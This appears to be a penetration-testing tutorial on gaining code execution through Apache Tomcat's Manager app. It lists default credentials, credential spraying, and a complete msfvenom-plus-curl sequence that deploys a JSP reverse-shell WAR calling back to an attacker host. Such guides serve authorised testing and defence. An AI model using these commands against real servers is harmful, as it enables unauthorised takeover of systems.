Tomcat bundles two different management web apps. The Manager app (/manager/html and the text API /manager/text, roles manager-gui/manager-script) can deploy a web application; deploying a WAR runs its code, so access to Manager is direct RCE. The Host-Manager app (/host-manager/html, roles admin-gui/admin-script) administers virtual hosts, it does not upload or deploy WARs. They are reached the same way (default/weak credentials, or the endpoint not being locked to an admin network), but only Manager gives the clean WAR-to-RCE path below.
Getting access#
- Default and weak credentials:
tomcat:tomcat,admin:admin,tomcat:s3cret,admin:<blank>, and vendor defaults intomcat-users.xml. The Manager requires a user with themanager-gui/manager-scriptrole. - Leaked credentials:
tomcat-users.xmlrecovered through AJP/Ghostcat, an exposed.git/backup, or a traversal read. - Reaching the endpoint:
/manager/html,/manager/text,/host-manager/html; sometimes only localhost-restricted at the app but reachable via a proxy normalization mismatch or origin exposure.
Deploying a WAR#
Build a WAR containing a JSP webshell and deploy it through the text API:
# Build a JSP webshell WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=you LPORT=4444 -f war > shell.war
# Deploy via the Manager text API (manager-script role)
curl -u tomcat:tomcat -T shell.war \
"http://target:8080/manager/text/deploy?path=/shell&update=true"
# Trigger it
curl "http://target:8080/shell/"
The GUI (/manager/html) offers the same via a file-upload form. Host-Manager is not a WAR-deploy route; where you only have Host-Manager, its abuse is virtual-host administration: create or reconfigure a host (appBase/docBase) and deploy-on-startup behavior so a context serves from an attacker-influenced directory, or remove a host to disrupt the app. That is weaker than Manager's direct deploy and depends on what else you can write on disk, so treat Host-Manager access as a pivot, not instant RCE.
Exploitation#
- Spray the common default credentials against
/manager/text/list(a200with an app list confirms access and role). - Deploy a JSP shell WAR, request its context path, and you have code execution as the Tomcat user.
- If only
manager-gui(notmanager-script) is available, use the HTML upload form; if the CSRF token blocks scripting, drive the GUI through the browser flow.
Tools#
- msfvenom (WAR payload), Metasploit
tomcat_mgr_deploy/tomcat_mgr_upload, hydra for credential spraying.
References#
- Apache Tomcat: Manager App HOW-TO, realm and role configuration
- OWASP: Testing for default credentials